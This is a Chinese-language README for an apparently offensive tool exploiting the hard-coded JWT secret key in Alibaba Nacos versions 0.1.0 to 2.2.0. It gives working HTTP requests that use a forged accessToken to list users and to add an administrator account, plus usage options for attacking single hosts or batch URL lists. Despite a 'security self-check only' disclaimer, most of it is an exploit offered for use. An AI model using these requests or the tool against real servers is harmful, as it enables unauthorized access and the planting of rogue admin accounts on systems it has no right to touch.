└── README.md


/README.md:
--------------------------------------------------------------------------------
 1 | 首发于t00ls.com，仅限安全自检，非法使用所造成的一切后果由使用者承担
 2 | 
 3 | ### 漏洞原理
 4 | 
 5 | 好多大佬都分享过了，这里就简单说下：
 6 | 
 7 | Nacos漏洞版本`/conf` 默认配置文件 `application.properties ` 中，`nacos.core.auth.default.token.secret.key` 使用了硬编码，使用该key可构造jwt进行token认证。
 8 | 
 9 | 认证成功后获得`accessToken` ，使用`accessToken` 可对Naocs进行任意操作（这不废话么，已经登录了）
10 | 
11 | ### 影响范围
12 | 
13 | 0.1.0 <= Nacos <= 2.2.0
14 | 
15 | ### 工具思路
16 | 既然登录后使用`accessToken`可以进行任意操作，那直接查看管理员或者干脆新增用户登录不就得了么，这里加上认证成功后的token 直接使用CVE-2021-29441的payload读取用户列表和新增系统用户，如下：
17 | 
18 | 查看用户列表
19 | ```http
20 | GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
21 | Host: xxx
22 | accessToken: xxxxxx
23 | ```
24 | 新增管理员
25 | ```http
26 | POST /nacos/v1/auth/users HTTP/1.1
27 | Host: xxx
28 | Content-Type: application/x-www-form-urlencoded
29 | accessToken: xxx
30 | Content-Length: 27
31 | 
32 | username=fuck&password=fuck
33 | ```
34 | 
35 | ### Tools Usage
36 | 
37 | ```shell
38 | _____                 ____      ___         _ _   _____     _
39 | |   | |___ ___ ___ ___|    \ ___|  _|___ _ _| | |_|_   _|___| |_ ___ ___
40 | | | | | .'|  _| . |_ -|  |  | -_|  _| .'| | | |  _| | | | . | '_| -_|   |
41 | |_|___|__,|___|___|___|____/|___|_| |__,|___|_|_|   |_| |___|_,_|___|_|_|
42 | 
43 | Alibaba Nacos Default Token身份认证绕过 author: Dghpi9
44 | vul version: 0.1.0 <= Nacos <= 2.2.0
45 | Usage:
46 |  -u http://192.168.0.1:8848 -g  读取用户列表
47 |  -u http://192.168.0.1:8848 -a  新增系统用户
48 |  -f url.txt -g  批量读取用户列表
49 |  -f url.txt -a  批量新增用户
50 | Options:
51 |   -u string
52 |         指定单个目标
53 |   -f string
54 |         传入文件列表
55 |   -g    读取用户列表
56 |   -a    新增系统用户
57 | ```
58 | 
59 | 


--------------------------------------------------------------------------------